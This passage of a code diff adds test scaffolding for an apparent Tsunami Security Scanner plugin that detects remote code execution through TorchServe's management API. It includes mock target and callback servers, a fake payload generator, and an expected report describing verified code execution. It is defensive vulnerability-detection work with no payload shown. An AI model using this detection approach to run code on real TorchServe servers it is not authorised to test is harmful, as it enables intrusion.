downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + private List getDetectionReports() { + return detector + .detect( + TargetInfo.getDefaultInstance(), ImmutableList.of(NetworkService.getDefaultInstance())) + .getDetectionReportsList(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java new file mode 100644 index 000000000..4b8eca457 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java @@ -0,0 +1,101 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.inject.AbstractModule; +import com.google.inject.Guice; +import com.google.inject.Injector; +import com.google.inject.Module; +import com.google.inject.name.Named; +import com.google.inject.name.Names; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; + +public abstract class TorchServeManagementApiTestBase { + @Inject + @Named("target") + protected MockWebServer mockTorchServe; + + protected final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + // These should be defined in the subclass as needed + // @Inject + // protected TorchServeManagementApiDetector detector; + + // @Inject + // protected TorchServeExploiter exploiter; + + private static class CustomTestModule extends AbstractModule { + private FakeUtcClock fakeUtcClock; + + CustomTestModule(FakeUtcClock fakeUtcClock) { + this.fakeUtcClock = fakeUtcClock; + } + + @Override + protected void configure() { + // Guice modules provide by Tsunami + install(new HttpClientModule.Builder().build()); + install(new FakeUtcClockModule(fakeUtcClock)); + + bind(MockWebServer.class) + .annotatedWith(Names.named("target")) + .toInstance(new MockWebServer()); + + FakePayloadGeneratorModule fakePayloadGeneratorModule = + FakePayloadGeneratorModule.builder().build(); + install(fakePayloadGeneratorModule); + + // Our detector and exploiter + bind(TorchServeRandomUtils.class).to(MockTorchServeRandomUtils.class); + bind(TorchServeManagementApiDetector.class); + bind(TorchServeExploiter.class); + bind(TorchServeManagementAPIExploiterWebServer.class) + .to(MockTorchServeManagementApiExploiterWebServer.class); + } + } + + protected Module getBaseModule() { + return new CustomTestModule(fakeUtcClock); + } + + // Override this in subclasses for custom setup + protected void onTestExecution() throws IOException { + // Do nothing + } + + @Before + public void setUp() throws IOException { + Injector baseInjector = Guice.createInjector(getBaseModule()); + baseInjector.injectMembers(this); + // this.mockTorchServe.start(); + onTestExecution(); + } + + @After + public void tearDown() throws IOException { + // this.mockTorchServe.shutdown(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java new file mode 100644 index 000000000..769f50ecc --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java @@ -0,0 +1,72 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.inject.AbstractModule; +import com.google.inject.Module; +import com.google.inject.name.Named; +import com.google.inject.name.Names; +import com.google.inject.util.Modules; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import java.io.IOException; +import java.security.SecureRandom; +import java.util.Arrays; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; + +public abstract class TorchServeManagementApiTestBaseWithCallbackServer + extends TorchServeManagementApiTestBase { + @Inject + @Named("callback") + protected MockWebServer mockCallbackServer; + + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Override + protected Module getBaseModule() { + Module baseModule = super.getBaseModule(); + Module callbackModule = + new AbstractModule() { + @Override + protected void configure() { + MockWebServer mockCallbackServerInstance = new MockWebServer(); + FakePayloadGeneratorModule fakePayloadGeneratorModule = + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServerInstance) + .setSecureRng(testSecureRandom) + .build(); + install(fakePayloadGeneratorModule); + bind(MockWebServer.class) + .annotatedWith(Names.named("callback")) + .toInstance(mockCallbackServerInstance); + } + }; + return Modules.override(baseModule).with(callbackModule); + } + + @After + public void tearDown() throws IOException { + super.tearDown(); + this.mockCallbackServer.shutdown(); + } +}